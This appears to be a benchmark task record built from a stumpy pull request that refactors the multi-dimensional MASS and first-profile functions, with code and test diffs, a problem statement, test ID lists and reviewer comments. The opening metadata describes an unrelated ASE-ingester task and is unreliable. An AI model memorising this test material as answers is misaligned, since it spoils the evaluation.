{ "num_modified_files": 8, "num_modified_lines": 211, "pr_author": "ml-evs", "pr_labels": [ "enhancement: New feature or request", "adapters: Issues pertaining to adapters (converters)", "ergonomics: Features that improve the usability of the package" ], "llm_metadata": { "code": "B2", "code_quality": null, "confidence": 0.78, "detected_issues": { "B1": false, "B2": true, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "hard", "external_urls": [], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding an ASE ingester and generalising ingestion utilities, which aligns with the new `ingest_from` method and related changes. However, the test suite asserts specific naming conventions for ASE metadata keys (e.g., handling of _ase_ prefixes and double‑underscore re‑addition) and revised formula reduction messages that are not described in the issue text, indicating an implicit naming requirement. Therefore the task is classified as B2 (implicit naming).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests expect ASE info keys to be transformed with a leading '_ase_' prefix and re‑added with double underscores for keys missing the prefix.", "Tests check that formula reduction error messages use the reduced formula string rather than the original GCD description." 
], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
99988be3f81672a05264f987cb0026fc9d10b91c
2020-03-03 14:04:30
tdameritrade__stumpy-137
diff --git a/stumpy/mstump.py b/stumpy/mstump.py index 5ee2447..9e00372 100644 --- a/stumpy/mstump.py +++ b/stumpy/mstump.py @@ -12,10 +12,10 @@ from . import core logger = logging.getLogger(__name__) -def _multi_mass(Q, T, m, M_T, Σ_T, trivial_idx, excl_zone): +def _multi_mass(Q, T, m, M_T, Σ_T): """ A multi-dimensional wrapper around "Mueen's Algorithm for Similarity Search" - (MASS) to compute multi-dimensional MASS. + (MASS) to compute multi-dimensional distance profile. Parameters ---------- @@ -34,54 +34,29 @@ def _multi_mass(Q, T, m, M_T, Σ_T, trivial_idx, excl_zone): Σ_T : ndarray Sliding standard deviation for `T` - trivial_idx : int - Index for the start of the trivial self-join - - excl_zone : int - The half width for the exclusion zone relative to the `trivial_idx`. - If the `trivial_idx` is `None` then this parameter is ignored. - Returns ------- - P : ndarray - Multi-dimensional matrix profile - - I : ndarray - Multi-dimensional matrix profile indices + D : ndarray + Multi-dimensional distance profile """ - d = T.shape[0] - n = T.shape[1] + d, n = T.shape k = n - m + 1 - P = np.full((d, k), np.inf, dtype="float64") D = np.empty((d, k), dtype="float64") - I = np.ones((d, k), dtype="int64") * -1 for i in range(d): D[i, :] = core.mass(Q[i], T[i], M_T[i], Σ_T[i]) - zone_start = max(0, trivial_idx - excl_zone) - zone_stop = min(k, trivial_idx + excl_zone) - D[:, zone_start : zone_stop + 1] = np.inf - # Column-wise sort - # row_idx = np.argsort(D, axis=0) - # D = D[row_idx, np.arange(row_idx.shape[1])] D = np.sort(D, axis=0) D_prime = np.zeros(k) for i in range(d): - D_prime = D_prime + D[i] - D_prime_prime = D_prime / (i + 1) - # Element-wise Min - # col_idx = np.argmin([P[i, :], D_prime_prime], axis=0) - # col_mask = col_idx > 0 - col_mask = P[i] > D_prime_prime - P[i, col_mask] = D_prime_prime[col_mask] - I[i, col_mask] = trivial_idx + D_prime[:] = D_prime + D[i] + D[i, :] = D_prime / (i + 1) - return P, I + return D def _get_first_mstump_profile(start, 
T, m, excl_zone, M_T, Σ_T): @@ -123,8 +98,22 @@ def _get_first_mstump_profile(start, T, m, excl_zone, M_T, Σ_T): equal to `start` """ - # Handle first subsequence, add exclusionary zone - P, I = _multi_mass(T[:, start : start + m], T, m, M_T, Σ_T, start, excl_zone) + d, n = T.shape + D = _multi_mass(T[:, start : start + m], T, m, M_T, Σ_T) + + zone_start = max(0, start - excl_zone) + zone_stop = min(n - m + 1, start + excl_zone) + D[:, zone_start : zone_stop + 1] = np.inf + + P = np.full(d, np.inf, dtype="float64") + I = np.ones(d, dtype="int64") * -1 + + for i in range(d): + min_index = np.argmin(D[i]) + I[i] = min_index + P[i] = D[i, min_index] + if np.isinf(P[i]): # pragma nocover + I[i] = -1 return P, I @@ -314,19 +303,18 @@ def _mstump( D = np.sqrt(D) # Column-wise sort - for col in range(k): - # row_idx[:, col] = np.argsort(D[:, col]) - # D[:, col] = D[row_idx[:, col], col] + for col in prange(k): D[:, col] = np.sort(D[:, col]) + D_prime[:] = 0.0 for i in range(d): D_prime = D_prime + D[i] - D_prime_prime = D_prime / (i + 1) - # Element-wise Min - for col in range(k): - if P[i, col] > D_prime_prime[col]: - P[i, col] = D_prime_prime[col] - I[i, col] = idx + + min_index = np.argmin(D_prime) + I[i, idx] = min_index + P[i, idx] = D_prime[min_index] / (i + 1) + if np.isinf(P[i, idx]): # pragma nocover + I[i, idx] = -1 return P, I @@ -354,12 +342,12 @@ def mstump(T, m): Returns ------- P : ndarray - The multi-dimensional matrix profile. Each row of the array corresponds - to each matrix profile for a given dimension (i.e., the first row is the - 1-D matrix profile and the second row is the 2-D matrix profile). + The multi-dimensional matrix profile. Each column of the array corresponds + to each matrix profile for a given dimension (i.e., the first column is + the 1-D matrix profile and the second column is the 2-D matrix profile). 
I : ndarray - The multi-dimensional matrix profile index where each row of the array + The multi-dimensional matrix profile index where each column of the array corresponds to each matrix profile index for a given dimension. Notes @@ -397,7 +385,9 @@ def mstump(T, m): start = 0 stop = k - P, I = _get_first_mstump_profile(start, T, m, excl_zone, M_T, Σ_T) + P[:, start], I[:, start] = _get_first_mstump_profile( + start, T, m, excl_zone, M_T, Σ_T + ) QT, QT_first = _get_multi_QT(start, T, m) diff --git a/stumpy/mstumped.py b/stumpy/mstumped.py index d578004..27a11b2 100644 --- a/stumpy/mstumped.py +++ b/stumpy/mstumped.py @@ -41,12 +41,12 @@ def mstumped(dask_client, T, m): Returns ------- P : ndarray - The multi-dimensional matrix profile. Each row of the array corresponds - to each matrix profile for a given dimension (i.e., the first row is the - 1-D matrix profile and the second row is the 2-D matrix profile). + The multi-dimensional matrix profile. Each column of the array corresponds + to each matrix profile for a given dimension (i.e., the first column is + the 1-D matrix profile and the second column is the 2-D matrix profile). I : ndarray - The multi-dimensional matrix profile index where each row of the array + The multi-dimensional matrix profile index where each column of the array corresponds to each matrix profile index for a given dimension. 
Notes @@ -79,7 +79,7 @@ def mstumped(dask_client, T, m): M_T, Σ_T = core.compute_mean_std(T, m) μ_Q, σ_Q = core.compute_mean_std(T, m) - P = np.empty((nworkers, d, k), dtype="float64") + P = np.full((nworkers, d, k), np.inf, dtype="float64") D = np.zeros((nworkers, d, k), dtype="float64") D_prime = np.zeros((nworkers, k), dtype="float64") I = np.ones((nworkers, d, k), dtype="int64") * -1 @@ -100,7 +100,9 @@ def mstumped(dask_client, T, m): D_prime_futures = [] for i, start in enumerate(range(0, k, step)): - P[i], I[i] = _get_first_mstump_profile(start, T, m, excl_zone, M_T, Σ_T) + P[i, :, start], I[i, :, start] = _get_first_mstump_profile( + start, T, m, excl_zone, M_T, Σ_T + ) P_future = dask_client.scatter(P[i], workers=[hosts[i]]) I_future = dask_client.scatter(I[i], workers=[hosts[i]])
Fixed Issue #136 and improved mstump tests I tried to stick as much to the issue #136 as I could, but I had to make some changes that touch issue #135 . - The main change is that I converted `_multi_mass` to return the multidimensional distance profile as discussed. - I also changed `_get_first_mstump_profile` in a way so that it only returns the profile values and indices at index `start` so that this function is consistent with `stump._get_first_stump_profile`. I made this change in this PR because I had to move things to this function, e.g. the application of an exclusion zone, and it made sense to do it here. This does break the anytime ability of mstump though (because the distance profile of `T[start:start+m]` does not influence the whole matrix profile anymore). This is why I had to slightly change the logic of `_mstump`. I tried to leave it as untouched as possible. Also minor changes to `mstumped` had to be made. - Some tests were improved to actually use the defined functions. I also moved the `naive_mstump` function to `utils.py` to be able to reuse it in `test_mstumped.py`. Let me know what you think.
**Title** Correct multi‑dimensional distance handling and first‑profile computation for MSTump **Problem** `mstump` produced an incorrect matrix profile because the first distance profile was computed over the entire series and the exclusion zone was applied inconsistently. This also caused a mismatch in how the profile dimensions were documented and initialized. **Root Cause** The multi‑dimensional MASS wrapper returned a full matrix profile and accepted parameters for exclusion‑zone handling that were mis‑used, while the first‑profile helper returned values for all positions instead of only the starting column. **Fix / Expected Behavior** - Refactor the multi‑dimensional MASS wrapper to return only the distance profile. - Apply the exclusion zone explicitly after the distance profile is computed. - Adjust the first‑profile helper to output a single column (profile values and indices at the given start). - Update the iterative update logic to maintain correct minima per dimension using the newly‑computed distance profile. - Align documentation and array shapes so that each column corresponds to a dimension’s matrix profile, and initialize profiles with `inf` where appropriate. **Risk & Validation** - The new sorting and exclusion‑zone steps could affect performance; benchmarks should verify no regressions. - Ensure the parallel `mstumped` implementation mirrors the corrected single‑process logic; run existing parallel tests. - Added/updated tests compare the output against a naive reference implementation across multiple dimensions and verify proper handling of the exclusion zone.
137
TDAmeritrade/stumpy
diff --git a/tests/test_mstump.py b/tests/test_mstump.py index abd69d1..e620f5d 100644 --- a/tests/test_mstump.py +++ b/tests/test_mstump.py @@ -13,37 +13,6 @@ import pytest import utils -def naive_mass(Q, T, m, trivial_idx, excl_zone): - D = np.linalg.norm( - utils.z_norm(core.rolling_window(T, m), 1) - utils.z_norm(Q), axis=1 - ) - start = max(0, trivial_idx - excl_zone) - stop = min(T.shape[0] - Q.shape[0] + 1, trivial_idx + excl_zone) - D[start : stop + 1] = np.inf - - return D - - -def naive_PI(D, trivial_idx): - P = np.full((D.shape[0], D.shape[1]), np.inf) - I = np.ones((D.shape[0], D.shape[1]), dtype="int64") * -1 - - D = np.sort(D, axis=0) - - D_prime = np.zeros(D.shape[1]) - for i in range(D.shape[0]): - D_prime = D_prime + D[i] - D_prime_prime = D_prime / (i + 1) - # Element-wise Min - # col_idx = np.argmin([left_P[i, :], D_prime_prime], axis=0) - # col_mask = col_idx > 0 - col_mask = P[i] > D_prime_prime - P[i, col_mask] = D_prime_prime[col_mask] - I[i, col_mask] = trivial_idx - - return P, I - - def naive_rolling_window_dot_product(Q, T): window = len(Q) result = np.zeros(len(T) - window + 1) @@ -52,29 +21,6 @@ def naive_rolling_window_dot_product(Q, T): return result -def naive_mstump(T, m): - zone = int(np.ceil(m / 4)) - Q = core.rolling_window(T, m) - D = np.empty((Q.shape[0], Q.shape[1])) - P = np.full((Q.shape[0], Q.shape[1]), np.inf) - I = np.ones((Q.shape[0], Q.shape[1]), dtype="int64") * -1 - - # Left - for i in range(Q.shape[1]): - D[:] = 0.0 - for dim in range(T.shape[0]): - D[dim] = naive_mass(Q[dim, i], T[dim], m, i, zone) - - P_i, I_i = naive_PI(D, i) - - for dim in range(T.shape[0]): - col_mask = P[dim] > P_i[dim] - P[dim, col_mask] = P_i[dim, col_mask] - I[dim, col_mask] = I_i[dim, col_mask] - - return P, I - - test_data = [ (np.array([[584, -11, 23, 79, 1001, 0, -19]], dtype=np.float64), 3), (np.random.uniform(-1000, 1000, [3, 10]).astype(np.float64), 5), @@ -83,48 +29,27 @@ test_data = [ @pytest.mark.parametrize("T, m", test_data) def 
test_multi_mass(T, m): - - excl_zone = int(np.ceil(m / 4)) trivial_idx = 2 - Q = core.rolling_window(T, m) - # left - D = np.empty((Q.shape[0], Q.shape[1])) - - for i in range(T.shape[0]): - D[i] = naive_mass(Q[i, 0], T[i], m, trivial_idx, excl_zone) + Q = T[:, trivial_idx : trivial_idx + m] - left_P, left_I = naive_PI(D, trivial_idx) + left = utils.naive_multi_mass(Q, T, m) - # right - M_T = np.empty((Q.shape[0], Q.shape[1])) - Σ_T = np.empty((Q.shape[0], Q.shape[1])) - for i in range(Q.shape[0]): - M_T[i] = np.mean(Q[i], axis=1) - Σ_T[i] = np.std(Q[i], axis=1) - right_P, right_I = _multi_mass(Q[:, 0], T, m, M_T, Σ_T, trivial_idx, excl_zone) + M_T, Σ_T = core.compute_mean_std(T, m) + right = _multi_mass(Q, T, m, M_T, Σ_T) - npt.assert_almost_equal(left_P, right_P) - npt.assert_equal(left_I, right_I) + npt.assert_almost_equal(left, right) @pytest.mark.parametrize("T, m", test_data) def test_get_first_mstump_profile(T, m): excl_zone = int(np.ceil(m / 4)) start = 0 - Q = core.rolling_window(T, m) - # left - D = np.empty((Q.shape[0], Q.shape[1])) - for i in range(T.shape[0]): - D[i] = naive_mass(Q[i, 0], T[i], m, start, excl_zone) - - left_P, left_I = naive_PI(D, start) - - # right - M_T = np.empty((Q.shape[0], Q.shape[1])) - Σ_T = np.empty((Q.shape[0], Q.shape[1])) - for i in range(Q.shape[0]): - M_T[i] = np.mean(Q[i], axis=1) - Σ_T[i] = np.std(Q[i], axis=1) + + left_P, left_I = utils.naive_mstump(T, m, excl_zone) + left_P = left_P[start, :] + left_I = left_I[start, :] + + M_T, Σ_T = core.compute_mean_std(T, m) right_P, right_I = _get_first_mstump_profile(start, T, m, excl_zone, M_T, Σ_T) npt.assert_almost_equal(left_P, right_P) @@ -150,49 +75,36 @@ def test_get_multi_QT(T, m): npt.assert_almost_equal(left_QT_first, right_QT_first) -@pytest.mark.parametrize("T, m", test_data) -def test_mstump(T, m): - left_P, left_I = naive_mstump(T, m) +def test_naive_mstump(): + T = np.random.uniform(-1000, 1000, [1, 1000]).astype(np.float64) + m = 20 - # Right - d = T.shape[0] - n 
= T.shape[1] - k = n - m + 1 - excl_zone = int(np.ceil(m / 4)) # See Definition 3 and Figure 3 + excl_zone = int(np.ceil(m / 4)) - M_T, Σ_T = core.compute_mean_std(T, m) - μ_Q, σ_Q = core.compute_mean_std(T, m) + left = np.array( + [ + utils.naive_mass( + Q, T[0], m, trivial_idx=i, ignore_trivial=True, excl_zone=excl_zone + ) + for i, Q in enumerate(core.rolling_window(T[0], m)) + ], + dtype=object, + ) + left_P = left[np.newaxis, :, 0].T + left_I = left[np.newaxis, :, 1].T - P = np.empty((d, k), dtype="float64") - D = np.zeros((d, k), dtype="float64") - D_prime = np.zeros(k, dtype="float64") - I = np.ones((d, k), dtype="int64") * -1 + right_P, right_I = utils.naive_mstump(T, m, excl_zone) - start = 0 - stop = k - - P, I = _get_first_mstump_profile(start, T, m, excl_zone, M_T, Σ_T) - - QT, QT_first = _get_multi_QT(start, T, m) - - right_P, right_I = _mstump( - T, - m, - P, - I, - D, - D_prime, - stop, - excl_zone, - M_T, - Σ_T, - QT, - QT_first, - μ_Q, - σ_Q, - k, - start + 1, - ) + npt.assert_almost_equal(left_P, right_P) + npt.assert_almost_equal(left_I, right_I) + + +@pytest.mark.parametrize("T, m", test_data) +def test_mstump(T, m): + excl_zone = int(np.ceil(m / 4)) + + left_P, left_I = utils.naive_mstump(T, m, excl_zone) + right_P, right_I = mstump(T, m) npt.assert_almost_equal(left_P, right_P) npt.assert_almost_equal(left_I, right_I) @@ -200,17 +112,19 @@ def test_mstump(T, m): @pytest.mark.parametrize("T, m", test_data) def test_mstump_wrapper(T, m): - left_P, left_I = naive_mstump(T, m) + excl_zone = int(np.ceil(m / 4)) + + left_P, left_I = utils.naive_mstump(T, m, excl_zone) right_P, right_I = mstump(T, m) - npt.assert_almost_equal(left_P.T, right_P) - npt.assert_almost_equal(left_I.T, right_I) + npt.assert_almost_equal(left_P, right_P) + npt.assert_almost_equal(left_I, right_I) df = pd.DataFrame(T.T) right_P, right_I = mstump(df, m) - npt.assert_almost_equal(left_P.T, right_P) - npt.assert_almost_equal(left_I.T, right_I) + npt.assert_almost_equal(left_P, 
right_P) + npt.assert_almost_equal(left_I, right_I) def test_constant_subsequence_self_join(): @@ -218,7 +132,9 @@ def test_constant_subsequence_self_join(): T = np.array([T_A, T_A, np.random.rand(T_A.shape[0])]) m = 3 - left_P, left_I = naive_mstump(T, m) + excl_zone = int(np.ceil(m / 4)) + + left_P, left_I = utils.naive_mstump(T, m, excl_zone) right_P, right_I = mstump(T, m) - npt.assert_almost_equal(left_P.T, right_P) # ignore indices + npt.assert_almost_equal(left_P, right_P) # ignore indices diff --git a/tests/test_mstumped.py b/tests/test_mstumped.py index 272c080..850a2da 100644 --- a/tests/test_mstumped.py +++ b/tests/test_mstumped.py @@ -18,60 +18,6 @@ def dask_client(): cluster.close() -def naive_mass(Q, T, m, trivial_idx, excl_zone): - D = np.linalg.norm( - utils.z_norm(core.rolling_window(T, m), 1) - utils.z_norm(Q), axis=1 - ) - start = max(0, trivial_idx - excl_zone) - stop = min(T.shape[0] - Q.shape[0] + 1, trivial_idx + excl_zone) - D[start : stop + 1] = np.inf - - return D - - -def naive_PI(D, trivial_idx): - P = np.full((D.shape[0], D.shape[1]), np.inf) - I = np.ones((D.shape[0], D.shape[1]), dtype="int64") * -1 - - D = np.sort(D, axis=0) - - D_prime = np.zeros(D.shape[1]) - for i in range(D.shape[0]): - D_prime = D_prime + D[i] - D_prime_prime = D_prime / (i + 1) - # Element-wise Min - # col_idx = np.argmin([left_P[i, :], D_prime_prime], axis=0) - # col_mask = col_idx > 0 - col_mask = P[i] > D_prime_prime - P[i, col_mask] = D_prime_prime[col_mask] - I[i, col_mask] = trivial_idx - - return P, I - - -def naive_mstump(T, m): - zone = int(np.ceil(m / 4)) - Q = core.rolling_window(T, m) - D = np.empty((Q.shape[0], Q.shape[1])) - P = np.full((Q.shape[0], Q.shape[1]), np.inf) - I = np.ones((Q.shape[0], Q.shape[1]), dtype="int64") * -1 - - # Left - for i in range(Q.shape[1]): - D[:] = 0.0 - for dim in range(T.shape[0]): - D[dim] = naive_mass(Q[dim, i], T[dim], m, i, zone) - - P_i, I_i = naive_PI(D, i) - - for dim in range(T.shape[0]): - col_mask = P[dim] 
> P_i[dim] - P[dim, col_mask] = P_i[dim, col_mask] - I[dim, col_mask] = I_i[dim, col_mask] - - return P, I - - test_data = [ (np.array([[584, -11, 23, 79, 1001, 0, -19]], dtype=np.float64), 3), (np.random.uniform(-1000, 1000, [3, 10]).astype(np.float64), 5), @@ -81,22 +27,26 @@ test_data = [ @pytest.mark.filterwarnings("ignore:\\s+Port 8787 is already in use:UserWarning") @pytest.mark.parametrize("T, m", test_data) def test_mstumped(T, m, dask_client): - left_P, left_I = naive_mstump(T, m) + excl_zone = int(np.ceil(m / 4)) + + left_P, left_I = utils.naive_mstump(T, m, excl_zone) right_P, right_I = mstumped(dask_client, T, m) - npt.assert_almost_equal(left_P.T, right_P) - npt.assert_almost_equal(left_I.T, right_I) + npt.assert_almost_equal(left_P, right_P) + npt.assert_almost_equal(left_I, right_I) @pytest.mark.filterwarnings("ignore:\\s+Port 8787 is already in use:UserWarning") @pytest.mark.parametrize("T, m", test_data) def test_mstumped_df(T, m, dask_client): - left_P, left_I = naive_mstump(T, m) + excl_zone = int(np.ceil(m / 4)) + + left_P, left_I = utils.naive_mstump(T, m, excl_zone) df = pd.DataFrame(T.T) right_P, right_I = mstumped(dask_client, df, m) - npt.assert_almost_equal(left_P.T, right_P) - npt.assert_almost_equal(left_I.T, right_I) + npt.assert_almost_equal(left_P, right_P) + npt.assert_almost_equal(left_I, right_I) @pytest.mark.filterwarnings("ignore:\\s+Port 8787 is already in use:UserWarning") @@ -105,7 +55,9 @@ def test_constant_subsequence_self_join(dask_client): T = np.array([T_A, T_A, np.random.rand(T_A.shape[0])]) m = 3 - left_P, left_I = naive_mstump(T, m) + excl_zone = int(np.ceil(m / 4)) + + left_P, left_I = utils.naive_mstump(T, m, excl_zone) right_P, right_I = mstumped(dask_client, T, m) - npt.assert_almost_equal(left_P.T, right_P) # ignore indices + npt.assert_almost_equal(left_P, right_P) # ignore indices diff --git a/tests/utils.py b/tests/utils.py index 9cba7cc..862c946 100644 --- a/tests/utils.py +++ b/tests/utils.py @@ -58,3 +58,62 
@@ def replace_inf(x, value=0): x[x == np.inf] = value x[x == -np.inf] = value return + + +def naive_multi_mass(Q, T, m): + d, n = T.shape + + D = np.empty((d, n - m + 1)) + for i in range(d): + D[i] = np.linalg.norm( + z_norm(core.rolling_window(T[i], m), 1) - z_norm(Q[i]), axis=1 + ) + + D = np.sort(D, axis=0) + + D_prime = np.zeros(n - m + 1) + D_prime_prime = np.zeros((d, n - m + 1)) + for i in range(d): + D_prime[:] = D_prime + D[i] + D_prime_prime[i, :] = D_prime / (i + 1) + + return D_prime_prime + + +def naive_PI(D, trivial_idx, excl_zone): + d, k = D.shape + + P = np.full((d, k), np.inf) + I = np.ones((d, k), dtype="int64") * -1 + + zone_start = max(0, trivial_idx - excl_zone) + zone_end = min(k, trivial_idx + excl_zone) + D[:, zone_start : zone_end + 1] = np.inf + + for i in range(d): + col_mask = P[i] > D[i] + P[i, col_mask] = D[i, col_mask] + I[i, col_mask] = trivial_idx + + return P, I + + +def naive_mstump(T, m, excl_zone): + d, n = T.shape + k = n - m + 1 + + P = np.full((d, k), np.inf) + I = np.ones((d, k), dtype="int64") * -1 + + for i in range(k): + Q = T[:, i : i + m] + D = naive_multi_mass(Q, T, m) + + P_i, I_i = naive_PI(D, i, excl_zone) + + for dim in range(T.shape[0]): + col_mask = P[dim] > P_i[dim] + P[dim, col_mask] = P_i[dim, col_mask] + I[dim, col_mask] = I_i[dim, col_mask] + + return P.T, I.T
[ "tests/test_mstump.py::test_multi_mass[T0-3]", "tests/test_mstump.py::test_multi_mass[T1-5]", "tests/test_mstump.py::test_get_first_mstump_profile[T0-3]", "tests/test_mstump.py::test_get_first_mstump_profile[T1-5]" ]
[ "tests/test_mstump.py::test_get_multi_QT[T0-3]", "tests/test_mstump.py::test_get_multi_QT[T1-5]", "tests/test_mstump.py::test_naive_mstump", "tests/test_mstump.py::test_mstump[T0-3]", "tests/test_mstump.py::test_mstump[T1-5]", "tests/test_mstump.py::test_mstump_wrapper[T0-3]", "tests/test_mstump.py::test_mstump_wrapper[T1-5]", "tests/test_mstump.py::test_constant_subsequence_self_join", "tests/test_mstumped.py::test_mstumped[T0-3]", "tests/test_mstumped.py::test_mstumped[T1-5]", "tests/test_mstumped.py::test_mstumped_df[T0-3]", "tests/test_mstumped.py::test_mstumped_df[T1-5]", "tests/test_mstumped.py::test_constant_subsequence_self_join" ]
Function: _multi_mass(Q, T, m, M_T, Σ_T) Location: stumpy/mstump.py Inputs: - Q: ndarray of shape (d, m) – the query subsequence (across d dimensions). - T: ndarray of shape (d, n) – the multidimensional time series. - m: int – subsequence length. - M_T: ndarray of shape (d, k) – sliding means of T for each dimension (`k = n‑m+1`). - Σ_T: ndarray of shape (d, k) – sliding standard deviations of T for each dimension. Outputs: - D: ndarray of shape (d, k) – the multi‑dimensional distance profile (sorted column‑wise) for the query Q against T. Description: Computes MASS‑based distance profiles for each dimension, stacks them, sorts each column, and then cumulatively averages to obtain the multi‑dimensional distance profile. The previous version also required `trivial_idx` and `excl_zone`; those arguments have been removed, and exclusion‑zone handling is now performed by the caller. Function: _get_first_mstump_profile(start, T, m, excl_zone, M_T, Σ_T) Location: stumpy/mstump.py Inputs: - start: int – index of the first subsequence to process. - T: ndarray of shape (d, n) – the multidimensional time series. - m: int – subsequence length. - excl_zone: int – half‑width of the exclusion zone around `start`. - M_T: ndarray of shape (d, k) – sliding means of T. - Σ_T: ndarray of shape (d, k) – sliding standard deviations of T. Outputs: - P: ndarray of shape (d,) – the multi‑dimensional matrix‑profile values for the subsequence starting at `start` (one value per dimension). - I: ndarray of shape (d,) – the corresponding matrix‑profile index for each dimension (‑1 if the value is infinite). Description: Retrieves the distance profile for the subsequence `T[:, start:start+m]` via `_multi_mass`, applies the exclusion zone, then for each dimension selects the minimum distance and its index. 
Unlike the previous implementation which returned full profile matrices, it now returns only the profile values and indices for the specified `start` position, matching the updated test expectations.
custom-check-github
{ "base_image_name": "python_base_310", "install": [ "pip install -q -e .", "pip install -q pytest pandas dask distributed coverage flake8 black" ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/test_mstump.py tests/test_mstumped.py tests/utils.py" }
{ "num_modified_files": 2, "num_modified_lines": 47, "pr_author": "mexxexx", "pr_labels": [], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.78, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue describes a set of code changes (converting _multi_mass, adjusting _get_first_mstump_profile, moving naive implementations) and corresponding test updates, but it does not pose a clear, actionable problem statement or acceptance criteria; it reads like a commit message rather than a well‑specified task. The provided tests are consistent with the described changes, so there is no mismatch between test expectations and the described behavior. The primary problem is the ambiguous specification of what remains to be done, which matches B4 (AMBIGUOUS_SPEC).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, 
"test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
f0ab95d89309aa5ec5da946f0f46e8563ffd0ebf
2020-05-24 16:04:32
codecov-commenter: # [Codecov](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183?src=pr&el=h1) Report > Merging [#183](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183?src=pr&el=desc) into [master](https://codecov.io/gh/TDAmeritrade/stumpy/commit/f8cd8fbd40df3b0d748d2cf394e6a48f6d581fb6&el=desc) will **not change** coverage. > The diff coverage is `100.00%`. [![Impacted file tree graph](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183/graphs/tree.svg?width=650&height=150&src=pr&token=u0DooAbGji)](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## master #183 +/- ## ========================================= Coverage 100.00% 100.00% ========================================= Files 13 13 Lines 1058 1025 -33 ========================================= - Hits 1058 1025 -33 ``` | [Impacted Files](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [stumpy/core.py](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183/diff?src=pr&el=tree#diff-c3R1bXB5L2NvcmUucHk=) | `100.00% <100.00%> (ø)` | | | [stumpy/gpu\_stump.py](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183/diff?src=pr&el=tree#diff-c3R1bXB5L2dwdV9zdHVtcC5weQ==) | `100.00% <100.00%> (ø)` | | | [stumpy/stamp.py](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183/diff?src=pr&el=tree#diff-c3R1bXB5L3N0YW1wLnB5) | `100.00% <100.00%> (ø)` | | | [stumpy/stomp.py](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183/diff?src=pr&el=tree#diff-c3R1bXB5L3N0b21wLnB5) | `100.00% <100.00%> (ø)` | | | [stumpy/stump.py](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183/diff?src=pr&el=tree#diff-c3R1bXB5L3N0dW1wLnB5) | `100.00% <100.00%> (ø)` | | | [stumpy/stumped.py](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183/diff?src=pr&el=tree#diff-c3R1bXB5L3N0dW1wZWQucHk=) | `100.00% <100.00%> (ø)` | | | [stumpy/mstump.py](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183/diff?src=pr&el=tree#diff-c3R1bXB5L21zdHVtcC5weQ==) | `100.00% <0.00%> 
(ø)` | | | [stumpy/scrump.py](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183/diff?src=pr&el=tree#diff-c3R1bXB5L3NjcnVtcC5weQ==) | `100.00% <0.00%> (ø)` | | ------ [Continue to review full report at Codecov](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183?src=pr&el=footer). Last update [f8cd8fb...449c749](https://codecov.io/gh/TDAmeritrade/stumpy/pull/183?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments). mexxexx: I honestly just forgot about scrump, there it will definitely be possible (although the exclusion zone is not necessary). For mstump I'll have to see, but it might work. I didn't move the `check_dtype` stuff inside, because I thought it doesn't belong there. As for the naive mean/std don't you think it's even more naive this way? Computing it in a rolling manner for each subsequence? seanlaw: > I honestly just forgot about scrump, there it will definitely be possible (although the exclusion zone is not necessary). For mstump I'll have to see, but it might work. 